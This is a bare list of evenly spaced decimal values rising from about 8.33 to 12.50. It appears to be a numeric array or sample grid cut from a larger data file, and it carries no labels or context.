8.331, 8.332, 8.333, 8.335, 8.336, 8.338, 8.339, 8.34, 8.342, 8.343, 8.344, 8.346, 8.347, 8.349, 8.35, 8.351, 8.353, 8.354, 8.356, 8.357, 8.358, 8.36, 8.361, 8.363, 8.364, 8.365, 8.367, 8.368, 8.369, 8.371, 8.372, 8.374, 8.375, 8.376, 8.378, 8.379, 8.381, 8.382, 8.383, 8.385, 8.386, 8.387, 8.389, 8.39, 8.392, 8.393, 8.394, 8.396, 8.397, 8.399, 8.4, 8.401, 8.403, 8.404, 8.406, 8.407, 8.408, 8.41, 8.411, 8.412, 8.414, 8.415, 8.417, 8.418, 8.419, 8.421, 8.422, 8.424, 8.425, 8.426, 8.428, 8.429, 8.431, 8.432, 8.433, 8.435, 8.436, 8.438, 8.439, 8.44, 8.442, 8.443, 8.444, 8.446, 8.447, 8.449, 8.45, 8.451, 8.453, 8.454, 8.456, 8.457, 8.458, 8.46, 8.461, 8.463, 8.464, 8.465, 8.467, 8.468, 8.469, 8.471, 8.472, 8.474, 8.475, 8.476, 8.478, 8.479, 8.481, 8.482, 8.483, 8.485, 8.486, 8.488, 8.489, 8.49, 8.492, 8.493, 8.494, 8.496, 8.497, 8.499, 8.5, 8.501, 8.503, 8.504, 8.506, 8.507, 8.508, 8.51, 8.511, 8.512, 8.514, 8.515, 8.517, 8.518, 8.519, 8.521, 8.522, 8.524, 8.525, 8.526, 8.528, 8.529, 8.531, 8.532, 8.533, 8.535, 8.536, 8.537, 8.539, 8.54, 8.542, 8.543, 8.544, 8.546, 8.547, 8.549, 8.55, 8.551, 8.553, 8.554, 8.556, 8.557, 8.558, 8.56, 8.561, 8.562, 8.564, 8.565, 8.567, 8.568, 8.569, 8.571, 8.572, 8.574, 8.575, 8.576, 8.578, 8.579, 8.581, 8.582, 8.583, 8.585, 8.586, 8.588, 8.589, 8.59, 8.592, 8.593, 8.594, 8.596, 8.597, 8.599, 8.6, 8.601, 8.603, 8.604, 8.606, 8.607, 8.608, 8.61, 8.611, 8.613, 8.614, 8.615, 8.617, 8.618, 8.619, 8.621, 8.622, 8.624, 8.625, 8.626, 8.628, 8.629, 8.631, 8.632, 8.633, 8.635, 8.636, 8.637, 8.639, 8.64, 8.642, 8.643, 8.644, 8.646, 8.647, 8.649, 8.65, 8.651, 8.653, 8.654, 8.656, 8.657, 8.658, 8.66, 8.661, 8.662, 8.664, 8.665, 8.667, 8.668, 8.669, 8.671, 8.672, 8.674, 8.675, 8.676, 8.678, 8.679, 8.681, 8.682, 8.683, 8.685, 8.686, 8.688, 8.689, 8.69, 8.692, 8.693, 8.694, 8.696, 8.697, 8.699, 8.7, 8.701, 8.703, 8.704, 8.706, 8.707, 8.708, 8.71, 8.711, 8.713, 8.714, 8.715, 8.717, 8.718, 8.719, 8.721, 8.722, 8.724, 8.725, 8.726, 8.728, 8.729, 8.731, 8.732, 8.733, 8.735, 8.736, 8.738, 8.739, 8.74, 8.742, 8.743, 8.744, 8.746, 8.747, 8.749, 8.75, 8.751, 8.753, 8.754, 8.756, 8.757, 8.758, 8.76, 8.761, 8.762, 8.764, 8.765, 8.767, 8.768, 8.769, 8.771, 8.772, 8.774, 8.775, 8.776, 8.778, 8.779, 8.781, 8.782, 8.783, 8.785, 8.786, 8.787, 8.789, 8.79, 8.792, 8.793, 8.794, 8.796, 8.797, 8.799, 8.8, 8.801, 8.803, 8.804, 8.806, 8.807, 8.808, 8.81, 8.811, 8.812, 8.814, 8.815, 8.817, 8.818, 8.819, 8.821, 8.822, 8.824, 8.825, 8.826, 8.828, 8.829, 8.831, 8.832, 8.833, 8.835, 8.836, 8.838, 8.839, 8.84, 8.842, 8.843, 8.844, 8.846, 8.847, 8.849, 8.85, 8.851, 8.853, 8.854, 8.856, 8.857, 8.858, 8.86, 8.861, 8.863, 8.864, 8.865, 8.867, 8.868, 8.869, 8.871, 8.872, 8.874, 8.875, 8.876, 8.878, 8.879, 8.881, 8.882, 8.883, 8.885, 8.886, 8.887, 8.889, 8.89, 8.892, 8.893, 8.894, 8.896, 8.897, 8.899, 8.9, 8.901, 8.903, 8.904, 8.906, 8.907, 8.908, 8.91, 8.911, 8.912, 8.914, 8.915, 8.917, 8.918, 8.919, 8.921, 8.922, 8.924, 8.925, 8.926, 8.928, 8.929, 8.931, 8.932, 8.933, 8.935, 8.936, 8.938, 8.939, 8.94, 8.942, 8.943, 8.944, 8.946, 8.947, 8.949, 8.95, 8.951, 8.953, 8.954, 8.956, 8.957, 8.958, 8.96, 8.961, 8.963, 8.964, 8.965, 8.967, 8.968, 8.969, 8.971, 8.972, 8.974, 8.975, 8.976, 8.978, 8.979, 8.981, 8.982, 8.983, 8.985, 8.986, 8.988, 8.989, 8.99, 8.992, 8.993, 8.994, 8.996, 8.997, 8.999, 9.0, 9.001, 9.003, 9.004, 9.006, 9.007, 9.008, 9.01, 9.011, 9.012, 9.014, 9.015, 9.017, 9.018, 9.019, 9.021, 9.022, 9.024, 9.025, 9.026, 9.028, 9.029, 9.031, 9.032, 9.033, 9.035, 9.036, 9.037, 9.039, 9.04, 9.042, 9.043, 9.044, 9.046, 9.047, 9.049, 9.05, 9.051, 9.053, 9.054, 9.056, 9.057, 9.058, 9.06, 9.061, 9.062, 9.064, 9.065, 9.067, 9.068, 9.069, 9.071, 9.072, 9.074, 9.075, 9.076, 9.078, 9.079, 9.081, 9.082, 9.083, 9.085, 9.086, 9.088, 9.089, 9.09, 9.092, 9.093, 9.094, 9.096, 9.097, 9.099, 9.1, 9.101, 9.103, 9.104, 9.106, 9.107, 9.108, 9.11, 9.111, 9.113, 9.114, 9.115, 9.117, 9.118, 9.119, 9.121, 9.122, 9.124, 9.125, 9.126, 9.128, 9.129, 9.131, 9.132, 9.133, 9.135, 9.136, 9.137, 9.139, 9.14, 9.142, 9.143, 9.144, 9.146, 9.147, 9.149, 9.15, 9.151, 9.153, 9.154, 9.156, 9.157, 9.158, 9.16, 9.161, 9.162, 9.164, 9.165, 9.167, 9.168, 9.169, 9.171, 9.172, 9.174, 9.175, 9.176, 9.178, 9.179, 9.181, 9.182, 9.183, 9.185, 9.186, 9.188, 9.189, 9.19, 9.192, 9.193, 9.194, 9.196, 9.197, 9.199, 9.2, 9.201, 9.203, 9.204, 9.206, 9.207, 9.208, 9.21, 9.211, 9.213, 9.214, 9.215, 9.217, 9.218, 9.219, 9.221, 9.222, 9.224, 9.225, 9.226, 9.228, 9.229, 9.231, 9.232, 9.233, 9.235, 9.236, 9.238, 9.239, 9.24, 9.242, 9.243, 9.244, 9.246, 9.247, 9.249, 9.25, 9.251, 9.253, 9.254, 9.256, 9.257, 9.258, 9.26, 9.261, 9.262, 9.264, 9.265, 9.267, 9.268, 9.269, 9.271, 9.272, 9.274, 9.275, 9.276, 9.278, 9.279, 9.281, 9.282, 9.283, 9.285, 9.286, 9.287, 9.289, 9.29, 9.292, 9.293, 9.294, 9.296, 9.297, 9.299, 9.3, 9.301, 9.303, 9.304, 9.306, 9.307, 9.308, 9.31, 9.311, 9.312, 9.314, 9.315, 9.317, 9.318, 9.319, 9.321, 9.322, 9.324, 9.325, 9.326, 9.328, 9.329, 9.331, 9.332, 9.333, 9.335, 9.336, 9.338, 9.339, 9.34, 9.342, 9.343, 9.344, 9.346, 9.347, 9.349, 9.35, 9.351, 9.353, 9.354, 9.356, 9.357, 9.358, 9.36, 9.361, 9.363, 9.364, 9.365, 9.367, 9.368, 9.369, 9.371, 9.372, 9.374, 9.375, 9.376, 9.378, 9.379, 9.381, 9.382, 9.383, 9.385, 9.386, 9.387, 9.389, 9.39, 9.392, 9.393, 9.394, 9.396, 9.397, 9.399, 9.4, 9.401, 9.403, 9.404, 9.406, 9.407, 9.408, 9.41, 9.411, 9.412, 9.414, 9.415, 9.417, 9.418, 9.419, 9.421, 9.422, 9.424, 9.425, 9.426, 9.428, 9.429, 9.431, 9.432, 9.433, 9.435, 9.436, 9.438, 9.439, 9.44, 9.442, 9.443, 9.444, 9.446, 9.447, 9.449, 9.45, 9.451, 9.453, 9.454, 9.456, 9.457, 9.458, 9.46, 9.461, 9.463, 9.464, 9.465, 9.467, 9.468, 9.469, 9.471, 9.472, 9.474, 9.475, 9.476, 9.478, 9.479, 9.481, 9.482, 9.483, 9.485, 9.486, 9.488, 9.489, 9.49, 9.492, 9.493, 9.494, 9.496, 9.497, 9.499, 9.5, 9.501, 9.503, 9.504, 9.506, 9.507, 9.508, 9.51, 9.511, 9.512, 9.514, 9.515, 9.517, 9.518, 9.519, 9.521, 9.522, 9.524, 9.525, 9.526, 9.528, 9.529, 9.531, 9.532, 9.533, 9.535, 9.536, 9.537, 9.539, 9.54, 9.542, 9.543, 9.544, 9.546, 9.547, 9.549, 9.55, 9.551, 9.553, 9.554, 9.556, 9.557, 9.558, 9.56, 9.561, 9.562, 9.564, 9.565, 9.567, 9.568, 9.569, 9.571, 9.572, 9.574, 9.575, 9.576, 9.578, 9.579, 9.581, 9.582, 9.583, 9.585, 9.586, 9.588, 9.589, 9.59, 9.592, 9.593, 9.594, 9.596, 9.597, 9.599, 9.6, 9.601, 9.603, 9.604, 9.606, 9.607, 9.608, 9.61, 9.611, 9.613, 9.614, 9.615, 9.617, 9.618, 9.619, 9.621, 9.622, 9.624, 9.625, 9.626, 9.628, 9.629, 9.631, 9.632, 9.633, 9.635, 9.636, 9.637, 9.639, 9.64, 9.642, 9.643, 9.644, 9.646, 9.647, 9.649, 9.65, 9.651, 9.653, 9.654, 9.656, 9.657, 9.658, 9.66, 9.661, 9.662, 9.664, 9.665, 9.667, 9.668, 9.669, 9.671, 9.672, 9.674, 9.675, 9.676, 9.678, 9.679, 9.681, 9.682, 9.683, 9.685, 9.686, 9.688, 9.689, 9.69, 9.692, 9.693, 9.694, 9.696, 9.697, 9.699, 9.7, 9.701, 9.703, 9.704, 9.706, 9.707, 9.708, 9.71, 9.711, 9.713, 9.714, 9.715, 9.717, 9.718, 9.719, 9.721, 9.722, 9.724, 9.725, 9.726, 9.728, 9.729, 9.731, 9.732, 9.733, 9.735, 9.736, 9.738, 9.739, 9.74, 9.742, 9.743, 9.744, 9.746, 9.747, 9.749, 9.75, 9.751, 9.753, 9.754, 9.756, 9.757, 9.758, 9.76, 9.761, 9.762, 9.764, 9.765, 9.767, 9.768, 9.769, 9.771, 9.772, 9.774, 9.775, 9.776, 9.778, 9.779, 9.781, 9.782, 9.783, 9.785, 9.786, 9.787, 9.789, 9.79, 9.792, 9.793, 9.794, 9.796, 9.797, 9.799, 9.8, 9.801, 9.803, 9.804, 9.806, 9.807, 9.808, 9.81, 9.811, 9.812, 9.814, 9.815, 9.817, 9.818, 9.819, 9.821, 9.822, 9.824, 9.825, 9.826, 9.828, 9.829, 9.831, 9.832, 9.833, 9.835, 9.836, 9.838, 9.839, 9.84, 9.842, 9.843, 9.844, 9.846, 9.847, 9.849, 9.85, 9.851, 9.853, 9.854, 9.856, 9.857, 9.858, 9.86, 9.861, 9.863, 9.864, 9.865, 9.867, 9.868, 9.869, 9.871, 9.872, 9.874, 9.875, 9.876, 9.878, 9.879, 9.881, 9.882, 9.883, 9.885, 9.886, 9.887, 9.889, 9.89, 9.892, 9.893, 9.894, 9.896, 9.897, 9.899, 9.9, 9.901, 9.903, 9.904, 9.906, 9.907, 9.908, 9.91, 9.911, 9.912, 9.914, 9.915, 9.917, 9.918, 9.919, 9.921, 9.922, 9.924, 9.925, 9.926, 9.928, 9.929, 9.931, 9.932, 9.933, 9.935, 9.936, 9.938, 9.939, 9.94, 9.942, 9.943, 9.944, 9.946, 9.947, 9.949, 9.95, 9.951, 9.953, 9.954, 9.956, 9.957, 9.958, 9.96, 9.961, 9.963, 9.964, 9.965, 9.967, 9.968, 9.969, 9.971, 9.972, 9.974, 9.975, 9.976, 9.978, 9.979, 9.981, 9.982, 9.983, 9.985, 9.986, 9.988, 9.989, 9.99, 9.992, 9.993, 9.994, 9.996, 9.997, 9.999, 10.0, 10.001, 10.003, 10.004, 10.006, 10.007, 10.008, 10.01, 10.011, 10.012, 10.014, 10.015, 10.017, 10.018, 10.019, 10.021, 10.022, 10.024, 10.025, 10.026, 10.028, 10.029, 10.031, 10.032, 10.033, 10.035, 10.036, 10.037, 10.039, 10.04, 10.042, 10.043, 10.044, 10.046, 10.047, 10.049, 10.05, 10.051, 10.053, 10.054, 10.056, 10.057, 10.058, 10.06, 10.061, 10.062, 10.064, 10.065, 10.067, 10.068, 10.069, 10.071, 10.072, 10.074, 10.075, 10.076, 10.078, 10.079, 10.081, 10.082, 10.083, 10.085, 10.086, 10.088, 10.089, 10.09, 10.092, 10.093, 10.094, 10.096, 10.097, 10.099, 10.1, 10.101, 10.103, 10.104, 10.106, 10.107, 10.108, 10.11, 10.111, 10.113, 10.114, 10.115, 10.117, 10.118, 10.119, 10.121, 10.122, 10.124, 10.125, 10.126, 10.128, 10.129, 10.131, 10.132, 10.133, 10.135, 10.136, 10.137, 10.139, 10.14, 10.142, 10.143, 10.144, 10.146, 10.147, 10.149, 10.15, 10.151, 10.153, 10.154, 10.156, 10.157, 10.158, 10.16, 10.161, 10.162, 10.164, 10.165, 10.167, 10.168, 10.169, 10.171, 10.172, 10.174, 10.175, 10.176, 10.178, 10.179, 10.181, 10.182, 10.183, 10.185, 10.186, 10.188, 10.189, 10.19, 10.192, 10.193, 10.194, 10.196, 10.197, 10.199, 10.2, 10.201, 10.203, 10.204, 10.206, 10.207, 10.208, 10.21, 10.211, 10.213, 10.214, 10.215, 10.217, 10.218, 10.219, 10.221, 10.222, 10.224, 10.225, 10.226, 10.228, 10.229, 10.231, 10.232, 10.233, 10.235, 10.236, 10.238, 10.239, 10.24, 10.242, 10.243, 10.244, 10.246, 10.247, 10.249, 10.25, 10.251, 10.253, 10.254, 10.256, 10.257, 10.258, 10.26, 10.261, 10.262, 10.264, 10.265, 10.267, 10.268, 10.269, 10.271, 10.272, 10.274, 10.275, 10.276, 10.278, 10.279, 10.281, 10.282, 10.283, 10.285, 10.286, 10.287, 10.289, 10.29, 10.292, 10.293, 10.294, 10.296, 10.297, 10.299, 10.3, 10.301, 10.303, 10.304, 10.306, 10.307, 10.308, 10.31, 10.311, 10.312, 10.314, 10.315, 10.317, 10.318, 10.319, 10.321, 10.322, 10.324, 10.325, 10.326, 10.328, 10.329, 10.331, 10.332, 10.333, 10.335, 10.336, 10.338, 10.339, 10.34, 10.342, 10.343, 10.344, 10.346, 10.347, 10.349, 10.35, 10.351, 10.353, 10.354, 10.356, 10.357, 10.358, 10.36, 10.361, 10.363, 10.364, 10.365, 10.367, 10.368, 10.369, 10.371, 10.372, 10.374, 10.375, 10.376, 10.378, 10.379, 10.381, 10.382, 10.383, 10.385, 10.386, 10.387, 10.389, 10.39, 10.392, 10.393, 10.394, 10.396, 10.397, 10.399, 10.4, 10.401, 10.403, 10.404, 10.406, 10.407, 10.408, 10.41, 10.411, 10.412, 10.414, 10.415, 10.417, 10.418, 10.419, 10.421, 10.422, 10.424, 10.425, 10.426, 10.428, 10.429, 10.431, 10.432, 10.433, 10.435, 10.436, 10.438, 10.439, 10.44, 10.442, 10.443, 10.444, 10.446, 10.447, 10.449, 10.45, 10.451, 10.453, 10.454, 10.456, 10.457, 10.458, 10.46, 10.461, 10.463, 10.464, 10.465, 10.467, 10.468, 10.469, 10.471, 10.472, 10.474, 10.475, 10.476, 10.478, 10.479, 10.481, 10.482, 10.483, 10.485, 10.486, 10.488, 10.489, 10.49, 10.492, 10.493, 10.494, 10.496, 10.497, 10.499, 10.5, 10.501, 10.503, 10.504, 10.506, 10.507, 10.508, 10.51, 10.511, 10.512, 10.514, 10.515, 10.517, 10.518, 10.519, 10.521, 10.522, 10.524, 10.525, 10.526, 10.528, 10.529, 10.531, 10.532, 10.533, 10.535, 10.536, 10.537, 10.539, 10.54, 10.542, 10.543, 10.544, 10.546, 10.547, 10.549, 10.55, 10.551, 10.553, 10.554, 10.556, 10.557, 10.558, 10.56, 10.561, 10.562, 10.564, 10.565, 10.567, 10.568, 10.569, 10.571, 10.572, 10.574, 10.575, 10.576, 10.578, 10.579, 10.581, 10.582, 10.583, 10.585, 10.586, 10.588, 10.589, 10.59, 10.592, 10.593, 10.594, 10.596, 10.597, 10.599, 10.6, 10.601, 10.603, 10.604, 10.606, 10.607, 10.608, 10.61, 10.611, 10.613, 10.614, 10.615, 10.617, 10.618, 10.619, 10.621, 10.622, 10.624, 10.625, 10.626, 10.628, 10.629, 10.631, 10.632, 10.633, 10.635, 10.636, 10.637, 10.639, 10.64, 10.642, 10.643, 10.644, 10.646, 10.647, 10.649, 10.65, 10.651, 10.653, 10.654, 10.656, 10.657, 10.658, 10.66, 10.661, 10.662, 10.664, 10.665, 10.667, 10.668, 10.669, 10.671, 10.672, 10.674, 10.675, 10.676, 10.678, 10.679, 10.681, 10.682, 10.683, 10.685, 10.686, 10.688, 10.689, 10.69, 10.692, 10.693, 10.694, 10.696, 10.697, 10.699, 10.7, 10.701, 10.703, 10.704, 10.706, 10.707, 10.708, 10.71, 10.711, 10.713, 10.714, 10.715, 10.717, 10.718, 10.719, 10.721, 10.722, 10.724, 10.725, 10.726, 10.728, 10.729, 10.731, 10.732, 10.733, 10.735, 10.736, 10.738, 10.739, 10.74, 10.742, 10.743, 10.744, 10.746, 10.747, 10.749, 10.75, 10.751, 10.753, 10.754, 10.756, 10.757, 10.758, 10.76, 10.761, 10.762, 10.764, 10.765, 10.767, 10.768, 10.769, 10.771, 10.772, 10.774, 10.775, 10.776, 10.778, 10.779, 10.781, 10.782, 10.783, 10.785, 10.786, 10.787, 10.789, 10.79, 10.792, 10.793, 10.794, 10.796, 10.797, 10.799, 10.8, 10.801, 10.803, 10.804, 10.806, 10.807, 10.808, 10.81, 10.811, 10.812, 10.814, 10.815, 10.817, 10.818, 10.819, 10.821, 10.822, 10.824, 10.825, 10.826, 10.828, 10.829, 10.831, 10.832, 10.833, 10.835, 10.836, 10.838, 10.839, 10.84, 10.842, 10.843, 10.844, 10.846, 10.847, 10.849, 10.85, 10.851, 10.853, 10.854, 10.856, 10.857, 10.858, 10.86, 10.861, 10.863, 10.864, 10.865, 10.867, 10.868, 10.869, 10.871, 10.872, 10.874, 10.875, 10.876, 10.878, 10.879, 10.881, 10.882, 10.883, 10.885, 10.886, 10.887, 10.889, 10.89, 10.892, 10.893, 10.894, 10.896, 10.897, 10.899, 10.9, 10.901, 10.903, 10.904, 10.906, 10.907, 10.908, 10.91, 10.911, 10.912, 10.914, 10.915, 10.917, 10.918, 10.919, 10.921, 10.922, 10.924, 10.925, 10.926, 10.928, 10.929, 10.931, 10.932, 10.933, 10.935, 10.936, 10.938, 10.939, 10.94, 10.942, 10.943, 10.944, 10.946, 10.947, 10.949, 10.95, 10.951, 10.953, 10.954, 10.956, 10.957, 10.958, 10.96, 10.961, 10.963, 10.964, 10.965, 10.967, 10.968, 10.969, 10.971, 10.972, 10.974, 10.975, 10.976, 10.978, 10.979, 10.981, 10.982, 10.983, 10.985, 10.986, 10.988, 10.989, 10.99, 10.992, 10.993, 10.994, 10.996, 10.997, 10.999, 11.0, 11.001, 11.003, 11.004, 11.006, 11.007, 11.008, 11.01, 11.011, 11.012, 11.014, 11.015, 11.017, 11.018, 11.019, 11.021, 11.022, 11.024, 11.025, 11.026, 11.028, 11.029, 11.031, 11.032, 11.033, 11.035, 11.036, 11.037, 11.039, 11.04, 11.042, 11.043, 11.044, 11.046, 11.047, 11.049, 11.05, 11.051, 11.053, 11.054, 11.056, 11.057, 11.058, 11.06, 11.061, 11.062, 11.064, 11.065, 11.067, 11.068, 11.069, 11.071, 11.072, 11.074, 11.075, 11.076, 11.078, 11.079, 11.081, 11.082, 11.083, 11.085, 11.086, 11.088, 11.089, 11.09, 11.092, 11.093, 11.094, 11.096, 11.097, 11.099, 11.1, 11.101, 11.103, 11.104, 11.106, 11.107, 11.108, 11.11, 11.111, 11.113, 11.114, 11.115, 11.117, 11.118, 11.119, 11.121, 11.122, 11.124, 11.125, 11.126, 11.128, 11.129, 11.131, 11.132, 11.133, 11.135, 11.136, 11.137, 11.139, 11.14, 11.142, 11.143, 11.144, 11.146, 11.147, 11.149, 11.15, 11.151, 11.153, 11.154, 11.156, 11.157, 11.158, 11.16, 11.161, 11.162, 11.164, 11.165, 11.167, 11.168, 11.169, 11.171, 11.172, 11.174, 11.175, 11.176, 11.178, 11.179, 11.181, 11.182, 11.183, 11.185, 11.186, 11.188, 11.189, 11.19, 11.192, 11.193, 11.194, 11.196, 11.197, 11.199, 11.2, 11.201, 11.203, 11.204, 11.206, 11.207, 11.208, 11.21, 11.211, 11.213, 11.214, 11.215, 11.217, 11.218, 11.219, 11.221, 11.222, 11.224, 11.225, 11.226, 11.228, 11.229, 11.231, 11.232, 11.233, 11.235, 11.236, 11.238, 11.239, 11.24, 11.242, 11.243, 11.244, 11.246, 11.247, 11.249, 11.25, 11.251, 11.253, 11.254, 11.256, 11.257, 11.258, 11.26, 11.261, 11.262, 11.264, 11.265, 11.267, 11.268, 11.269, 11.271, 11.272, 11.274, 11.275, 11.276, 11.278, 11.279, 11.281, 11.282, 11.283, 11.285, 11.286, 11.287, 11.289, 11.29, 11.292, 11.293, 11.294, 11.296, 11.297, 11.299, 11.3, 11.301, 11.303, 11.304, 11.306, 11.307, 11.308, 11.31, 11.311, 11.312, 11.314, 11.315, 11.317, 11.318, 11.319, 11.321, 11.322, 11.324, 11.325, 11.326, 11.328, 11.329, 11.331, 11.332, 11.333, 11.335, 11.336, 11.338, 11.339, 11.34, 11.342, 11.343, 11.344, 11.346, 11.347, 11.349, 11.35, 11.351, 11.353, 11.354, 11.356, 11.357, 11.358, 11.36, 11.361, 11.363, 11.364, 11.365, 11.367, 11.368, 11.369, 11.371, 11.372, 11.374, 11.375, 11.376, 11.378, 11.379, 11.381, 11.382, 11.383, 11.385, 11.386, 11.387, 11.389, 11.39, 11.392, 11.393, 11.394, 11.396, 11.397, 11.399, 11.4, 11.401, 11.403, 11.404, 11.406, 11.407, 11.408, 11.41, 11.411, 11.412, 11.414, 11.415, 11.417, 11.418, 11.419, 11.421, 11.422, 11.424, 11.425, 11.426, 11.428, 11.429, 11.431, 11.432, 11.433, 11.435, 11.436, 11.438, 11.439, 11.44, 11.442, 11.443, 11.444, 11.446, 11.447, 11.449, 11.45, 11.451, 11.453, 11.454, 11.456, 11.457, 11.458, 11.46, 11.461, 11.463, 11.464, 11.465, 11.467, 11.468, 11.469, 11.471, 11.472, 11.474, 11.475, 11.476, 11.478, 11.479, 11.481, 11.482, 11.483, 11.485, 11.486, 11.488, 11.489, 11.49, 11.492, 11.493, 11.494, 11.496, 11.497, 11.499, 11.5, 11.501, 11.503, 11.504, 11.506, 11.507, 11.508, 11.51, 11.511, 11.512, 11.514, 11.515, 11.517, 11.518, 11.519, 11.521, 11.522, 11.524, 11.525, 11.526, 11.528, 11.529, 11.531, 11.532, 11.533, 11.535, 11.536, 11.537, 11.539, 11.54, 11.542, 11.543, 11.544, 11.546, 11.547, 11.549, 11.55, 11.551, 11.553, 11.554, 11.556, 11.557, 11.558, 11.56, 11.561, 11.562, 11.564, 11.565, 11.567, 11.568, 11.569, 11.571, 11.572, 11.574, 11.575, 11.576, 11.578, 11.579, 11.581, 11.582, 11.583, 11.585, 11.586, 11.588, 11.589, 11.59, 11.592, 11.593, 11.594, 11.596, 11.597, 11.599, 11.6, 11.601, 11.603, 11.604, 11.606, 11.607, 11.608, 11.61, 11.611, 11.613, 11.614, 11.615, 11.617, 11.618, 11.619, 11.621, 11.622, 11.624, 11.625, 11.626, 11.628, 11.629, 11.631, 11.632, 11.633, 11.635, 11.636, 11.637, 11.639, 11.64, 11.642, 11.643, 11.644, 11.646, 11.647, 11.649, 11.65, 11.651, 11.653, 11.654, 11.656, 11.657, 11.658, 11.66, 11.661, 11.662, 11.664, 11.665, 11.667, 11.668, 11.669, 11.671, 11.672, 11.674, 11.675, 11.676, 11.678, 11.679, 11.681, 11.682, 11.683, 11.685, 11.686, 11.688, 11.689, 11.69, 11.692, 11.693, 11.694, 11.696, 11.697, 11.699, 11.7, 11.701, 11.703, 11.704, 11.706, 11.707, 11.708, 11.71, 11.711, 11.713, 11.714, 11.715, 11.717, 11.718, 11.719, 11.721, 11.722, 11.724, 11.725, 11.726, 11.728, 11.729, 11.731, 11.732, 11.733, 11.735, 11.736, 11.738, 11.739, 11.74, 11.742, 11.743, 11.744, 11.746, 11.747, 11.749, 11.75, 11.751, 11.753, 11.754, 11.756, 11.757, 11.758, 11.76, 11.761, 11.762, 11.764, 11.765, 11.767, 11.768, 11.769, 11.771, 11.772, 11.774, 11.775, 11.776, 11.778, 11.779, 11.781, 11.782, 11.783, 11.785, 11.786, 11.787, 11.789, 11.79, 11.792, 11.793, 11.794, 11.796, 11.797, 11.799, 11.8, 11.801, 11.803, 11.804, 11.806, 11.807, 11.808, 11.81, 11.811, 11.812, 11.814, 11.815, 11.817, 11.818, 11.819, 11.821, 11.822, 11.824, 11.825, 11.826, 11.828, 11.829, 11.831, 11.832, 11.833, 11.835, 11.836, 11.838, 11.839, 11.84, 11.842, 11.843, 11.844, 11.846, 11.847, 11.849, 11.85, 11.851, 11.853, 11.854, 11.856, 11.857, 11.858, 11.86, 11.861, 11.863, 11.864, 11.865, 11.867, 11.868, 11.869, 11.871, 11.872, 11.874, 11.875, 11.876, 11.878, 11.879, 11.881, 11.882, 11.883, 11.885, 11.886, 11.887, 11.889, 11.89, 11.892, 11.893, 11.894, 11.896, 11.897, 11.899, 11.9, 11.901, 11.903, 11.904, 11.906, 11.907, 11.908, 11.91, 11.911, 11.912, 11.914, 11.915, 11.917, 11.918, 11.919, 11.921, 11.922, 11.924, 11.925, 11.926, 11.928, 11.929, 11.931, 11.932, 11.933, 11.935, 11.936, 11.938, 11.939, 11.94, 11.942, 11.943, 11.944, 11.946, 11.947, 11.949, 11.95, 11.951, 11.953, 11.954, 11.956, 11.957, 11.958, 11.96, 11.961, 11.963, 11.964, 11.965, 11.967, 11.968, 11.969, 11.971, 11.972, 11.974, 11.975, 11.976, 11.978, 11.979, 11.981, 11.982, 11.983, 11.985, 11.986, 11.988, 11.989, 11.99, 11.992, 11.993, 11.994, 11.996, 11.997, 11.999, 12.0, 12.001, 12.003, 12.004, 12.006, 12.007, 12.008, 12.01, 12.011, 12.012, 12.014, 12.015, 12.017, 12.018, 12.019, 12.021, 12.022, 12.024, 12.025, 12.026, 12.028, 12.029, 12.031, 12.032, 12.033, 12.035, 12.036, 12.037, 12.039, 12.04, 12.042, 12.043, 12.044, 12.046, 12.047, 12.049, 12.05, 12.051, 12.053, 12.054, 12.056, 12.057, 12.058, 12.06, 12.061, 12.062, 12.064, 12.065, 12.067, 12.068, 12.069, 12.071, 12.072, 12.074, 12.075, 12.076, 12.078, 12.079, 12.081, 12.082, 12.083, 12.085, 12.086, 12.088, 12.089, 12.09, 12.092, 12.093, 12.094, 12.096, 12.097, 12.099, 12.1, 12.101, 12.103, 12.104, 12.106, 12.107, 12.108, 12.11, 12.111, 12.113, 12.114, 12.115, 12.117, 12.118, 12.119, 12.121, 12.122, 12.124, 12.125, 12.126, 12.128, 12.129, 12.131, 12.132, 12.133, 12.135, 12.136, 12.137, 12.139, 12.14, 12.142, 12.143, 12.144, 12.146, 12.147, 12.149, 12.15, 12.151, 12.153, 12.154, 12.156, 12.157, 12.158, 12.16, 12.161, 12.162, 12.164, 12.165, 12.167, 12.168, 12.169, 12.171, 12.172, 12.174, 12.175, 12.176, 12.178, 12.179, 12.181, 12.182, 12.183, 12.185, 12.186, 12.188, 12.189, 12.19, 12.192, 12.193, 12.194, 12.196, 12.197, 12.199, 12.2, 12.201, 12.203, 12.204, 12.206, 12.207, 12.208, 12.21, 12.211, 12.213, 12.214, 12.215, 12.217, 12.218, 12.219, 12.221, 12.222, 12.224, 12.225, 12.226, 12.228, 12.229, 12.231, 12.232, 12.233, 12.235, 12.236, 12.238, 12.239, 12.24, 12.242, 12.243, 12.244, 12.246, 12.247, 12.249, 12.25, 12.251, 12.253, 12.254, 12.256, 12.257, 12.258, 12.26, 12.261, 12.262, 12.264, 12.265, 12.267, 12.268, 12.269, 12.271, 12.272, 12.274, 12.275, 12.276, 12.278, 12.279, 12.281, 12.282, 12.283, 12.285, 12.286, 12.287, 12.289, 12.29, 12.292, 12.293, 12.294, 12.296, 12.297, 12.299, 12.3, 12.301, 12.303, 12.304, 12.306, 12.307, 12.308, 12.31, 12.311, 12.312, 12.314, 12.315, 12.317, 12.318, 12.319, 12.321, 12.322, 12.324, 12.325, 12.326, 12.328, 12.329, 12.331, 12.332, 12.333, 12.335, 12.336, 12.338, 12.339, 12.34, 12.342, 12.343, 12.344, 12.346, 12.347, 12.349, 12.35, 12.351, 12.353, 12.354, 12.356, 12.357, 12.358, 12.36, 12.361, 12.363, 12.364, 12.365, 12.367, 12.368, 12.369, 12.371, 12.372, 12.374, 12.375, 12.376, 12.378, 12.379, 12.381, 12.382, 12.383, 12.385, 12.386, 12.387, 12.389, 12.39, 12.392, 12.393, 12.394, 12.396, 12.397, 12.399, 12.4, 12.401, 12.403, 12.404, 12.406, 12.407, 12.408, 12.41, 12.411, 12.412, 12.414, 12.415, 12.417, 12.418, 12.419, 12.421, 12.422, 12.424, 12.425, 12.426, 12.428, 12.429, 12.431, 12.432, 12.433, 12.435, 12.436, 12.438, 12.439, 12.44, 12.442, 12.443, 12.444, 12.446, 12.447, 12.449, 12.45, 12.451, 12.453, 12.454, 12.456, 12.457, 12.458, 12.46, 12.461, 12.463, 12.464, 12.465, 12.467, 12.468, 12.469, 12.471, 12.472, 12.474, 12.475, 12.476, 12.478, 12.479, 12.481, 12.482, 12.483, 12.485, 12.486, 12.488, 12.489, 12.49, 12.492, 12.493, 12.494, 12.496, 